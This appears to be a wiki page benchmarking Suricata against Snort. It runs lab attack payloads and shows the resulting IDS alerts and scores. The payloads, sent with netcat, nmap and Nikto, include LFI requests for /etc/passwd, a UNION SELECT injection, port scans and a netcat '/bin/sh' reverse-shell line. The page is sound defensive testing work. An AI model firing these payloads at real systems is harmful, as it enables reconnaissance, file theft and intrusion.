You are here:

Test rules

Synthesis

Test	Suricata	Snort
Simple LFI	1	1
LFI using NULL byte	1	1
Full SYN scan	0	1
Full Connect() port scan	0	1
SQL Injection (UNION SELECT)	1	0
Netcat reverse shell	1	1
Nikto scan	2	1
TOTAL	6	6

Simple LFI

Test: LFI
Payload:

echo "GET /index.php?page=../../../etc/passwd HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041202 Firefox/1.0\r\n\r\n" | nc 192.168.100.35 80

Suricata trace:

04/09/2011-10:53:29.625769  [**] [1:1122:8] WEB-MISC /etc/passwd [**] 
[Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.45:56588 -> 192.168.100.35:80

Suricata score: 1
Snort trace:

[**] [1:1122:8] WEB-MISC /etc/passwd [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:02:26.433483 192.168.100.45:53934 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:46637 IpLen:20 DgmLen:228 DF
***AP*** Seq: 0xBFE14A2D  Ack: 0x63F11DA3  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2554887 14316932 

[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2] 
04/20-08:02:26.433483 192.168.100.45:53934 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:46637 IpLen:20 DgmLen:228 DF
***AP*** Seq: 0xBFE14A2D  Ack: 0x63F11DA3  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2554887 14316932 
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-0478][Xref => http://www.securityfocus.com/bid/9809][Xref => http://www.securityfocus.com/bid/34240]

Snort score: 1

LFI using NULL byte

Test: LFI with NULL byte
Payload:

echo "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041202 Firefox/1.0\r\n\r\n" | nc 192.168.100.35 80

Suricata trace:

04/09/2011-10:53:29.625769  [**] [1:1122:8] WEB-MISC /etc/passwd [**] 
[Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.45:56588 -> 192.168.100.35:80

Suricata score: 1
Snort trace:

[**] [1:1122:8] WEB-MISC /etc/passwd [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:04:30.328756 192.168.100.45:53949 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:44285 IpLen:20 DgmLen:231 DF
***AP*** Seq: 0x32BFDA00  Ack: 0xD7FA85BF  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2585861 14347906 

[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2] 
04/20-08:04:30.328756 192.168.100.45:53949 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:44285 IpLen:20 DgmLen:231 DF
***AP*** Seq: 0x32BFDA00  Ack: 0xD7FA85BF  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2585861 14347906 
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-0478][Xref => http://www.securityfocus.com/bid/9809][Xref => http://www.securityfocus.com/bid/34240]

Snort score: 1

Full SYN scan

Test: Nmap full SYN scan
Payload:

sudo nmap -sS -p- 192.168.100.35

Suricata trace:

03/10/11-07:18:32.142741 [**] [1:2002911:4] ET SCAN Potential VNC Scan 5900-5920
[**] [Classification: Attempted Information Leak] [Priority: 3] {6} 
192.168.100.37:45743 -> 192.168.100.35:5915 [Xref => 
http://doc.emergingthreats.net/2002911][Xref => 
http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_VNC]
03/10/2011-11:47:54.043095 [**] [1:2010939:2] ET POLICY Suspicious inbound to 
PostgreSQL port 5432 [**] [Classification: Potentially Bad Traffic] 
[Priority: 2] {TCP} 192.168.100.37:33445 -> 192.168.100.35:5432
03/10/2011-11:48:05.658677 [**] [1:2010935:2] ET POLICY Suspicious inbound to 
MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] 
{TCP} 192.168.100.37:33445 -> 192.168.100.35:1433
03/10/2011-11:48:07.586325 [**] [1:2010936:2] ET POLICY Suspicious inbound to 
Oracle SQL port 1521 [**] [Classification: Potentially Bad Traffic] 
[Priority: 2] {TCP} 192.168.100.37:33445 -> 192.168.100.35:1521

Suricata score: 0
Snort trace:

[**] [122:1:1] PSNG_TCP_PORTSCAN [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:21:43.275110 192.168.100.45 -> 192.168.100.48
PROTO:255 TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:164 DF

[**] [1:1420:14] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:21:55.230376 192.168.100.45:36234 -> 192.168.100.48:162
TCP TTL:46 TOS:0x0 ID:42097 IpLen:20 DgmLen:44
******S* Seq: 0x75721B7E  Ack: 0x0  Win: 0xC00  TcpLen: 24
TCP Options (1) => MSS: 1460 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:14] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:21:59.405686 192.168.100.45:36234 -> 192.168.100.48:705
TCP TTL:56 TOS:0x0 ID:64248 IpLen:20 DgmLen:44
******S* Seq: 0x75721B7E  Ack: 0x0  Win: 0x400  TcpLen: 24
TCP Options (1) => MSS: 1460 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1418:14] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:22:02.992574 192.168.100.45:36234 -> 192.168.100.48:161
TCP TTL:53 TOS:0x0 ID:20910 IpLen:20 DgmLen:44
******S* Seq: 0x75721B7E  Ack: 0x0  Win: 0x800  TcpLen: 24
TCP Options (1) => MSS: 1460 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

Snort score: 1

Full Connect() port scan

Test: Nmap Connect() scan (full portscan)
Payload

nmap -sT -p- 192.168.100.35

Suricata trace

03/10/2011-11:50:18.996416 [**] [1:2010937:2] ET POLICY Suspicious inbound to mySQL port 3306 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:48340 -> 192.168.100.35:3306
03/10/2011-11:50:21.655106 [**] [1:2010936:2] ET POLICY Suspicious inbound to Oracle SQL port 1521 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:47206 -> 192.168.100.35:1521
03/10/2011-11:50:24.950351 [**] [1:2002910:4] ET SCAN Potential VNC Scan 5800-5820 [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.37:33214 -> 192.168.100.35:5808
03/10/2011-11:50:31.612656 [**] [1:2010939:2] ET POLICY Suspicious inbound to PostgreSQL port 5432 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:55158 -> 192.168.100.35:5432
03/10/2011-11:50:33.084266 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:49763 -> 192.168.100.35:1433
03/10/2011-11:50:38.919067 [**] [1:2010938:2] ET POLICY Suspicious inbound to mSQL port 4333 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:41224 -> 192.168.100.35:4333

Suricata score: 0
Snort trace:

[**] [122:1:1] PSNG_TCP_PORTSCAN [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:31.704995 192.168.100.45 -> 192.168.100.48
PROTO:255 TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:163 DF

[**] [1:1420:14] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:36.338489 192.168.100.45:56607 -> 192.168.100.48:162
TCP TTL:64 TOS:0x0 ID:24886 IpLen:20 DgmLen:60 DF
******S* Seq: 0x61D1B511  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2872359 0 NOP WS: 6 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1418:14] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:47.095424 192.168.100.45:42487 -> 192.168.100.48:161
TCP TTL:64 TOS:0x0 ID:64314 IpLen:20 DgmLen:60 DF
******S* Seq: 0x6C4C259D  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2875047 0 NOP WS: 6 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:14] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:47.874158 192.168.100.45:39828 -> 192.168.100.48:705
TCP TTL:64 TOS:0x0 ID:44658 IpLen:20 DgmLen:60 DF
******S* Seq: 0x6C977119  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2875243 0 NOP WS: 6 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

Snort score: 1

SQL Injection (UNION SELECT)

Test: SQL Injection: UNION SELECT
Payload:

echo "GET /form.php?q=1+UNION+SELECT+VERSION%28%29 HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n" | nc 192.168.100.35 80

Suricata trace:

03/10/2011-13:50:28.905522 [**] [1:2011037:3] ET WEB_SERVER Possible Attempt to Get SQL Server Version in URI using SELECT VERSION [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.37:56483 -> 192.168.100.35:80
03/10/2011-13:50:28.905522 [**] [1:2006446:11] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.37:56483 -> 192.168.100.35:80

Suricata score: 1
Snort trace:

[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2] 
04/20-08:24:58.892304 192.168.100.45:48032 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:11238 IpLen:20 DgmLen:133 DF
***AP*** Seq: 0xAEFA0F23  Ack: 0x543004B1  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2892998 14655046 
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-0478][Xref => http://www.securityfocus.com/bid/9809][Xref => http://www.securityfocus.com/bid/34240]

Snort score: 0

Netcat reverse shell

Test: Reverse shell (netcat)
Payload:

echo "/bin/sh" | nc 192.168.100.36 22

Suricata trace:

03/18/2011-16:35:02.790596  [**] [1:1324:10] EXPLOIT ssh CRC32 overflow /bin/sh [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.100.37:51409 -> 192.168.100.35:22

Suricata score: 1
Snort trace:

[**] [1:1324:10] EXPLOIT ssh CRC32 overflow /bin/sh [**]
[Classification: Executable code was detected] [Priority: 1] 
04/20-09:15:17.730318 192.168.100.45:33123 -> 192.168.100.48:22
TCP TTL:64 TOS:0x0 ID:53828 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0xB4907A94  Ack: 0x59EB5F7E  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 3647698 15409756 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0572][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0144][Xref => http://www.securityfocus.com/bid/2347]

Snort score: 1

Nikto scan

Test: Nikto scan (only cgi plugin)
Payload (nikto):

sudo ./nikto.pl -h 192.168.100.35 -Plugins cgi

Suricata trace:

03/14/2011-10:27:46.841236  [**] [1:1071:6] GPL WEB_SERVER .htpasswd access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.18:43160 -> 192.168.100.35:80
03/14/2011-10:27:47.502170  [**] [1:1201:7] GPL WEB_SERVER 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.35:80 -> 192.168.100.18:43162
03/14/2011-10:28:13.416060  [**] [1:2002677:10] ET SCAN Nikto Web App Scan in Progress [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.18:43165 -> 192.168.100.35:80
03/14/2011-10:28:13.934586  [**] [1:1201:7] GPL WEB_SERVER 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.35:80 -> 192.168.100.18:43166

Suricata score: 2
Snort trace:

[**] [1:1233:13] WEB-CLIENT Outlook EML access [**]
[Classification: Attempted User Privilege Gain] [Priority: 1] 

[**] [1:1245:17] WEB-IIS ISAPI .idq access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:971:17] WEB-IIS ISAPI .printer access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1071:8] WEB-MISC .htpasswd access [**]
[Classification: Web Application Attack] [Priority: 1] 

[**] [1:1129:9] WEB-MISC .htaccess access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:1129:9] WEB-MISC .htaccess access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:1242:17] WEB-IIS ISAPI .ida access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1044:12] WEB-IIS webhits access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1131:8] WEB-MISC .wwwacl access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:16630:2] POLICY download of .dat file [**]
[Classification: Misc activity] [Priority: 3] 

[**] [1:16629:2] POLICY download of .bin file [**]
[Classification: Misc activity] [Priority: 3] 

[**] [1:987:21] WEB-IIS .htr access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:977:19] WEB-IIS .cnf access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1130:8] WEB-MISC .wwwacl access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:1668:10] WEB-CGI /cgi-bin/ access [**]
[Classification: Web Application Attack] [Priority: 1] 

[**] [1:1880:7] WEB-MISC oracle web application server access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1029:14] WEB-IIS scripts-browse access [**]
[Classification: Web Application Attack] [Priority: 1]

Snort score: 1

Suricata-vs-snort/Test-cases/Test-rules

Synthesis

Simple LFI

LFI using NULL byte

Full SYN scan

Full Connect() port scan

SQL Injection (UNION SELECT)

Netcat reverse shell

Nikto scan

Comments

Share your opinion

Navigation menu

Suricata-vs-snort/Test-cases/Test-rules

Synthesis

Simple LFI

LFI using NULL byte

Full SYN scan

Full Connect() port scan

SQL Injection (UNION SELECT)

Netcat reverse shell

Nikto scan

Comments

Share your opinion

Navigation menu

Search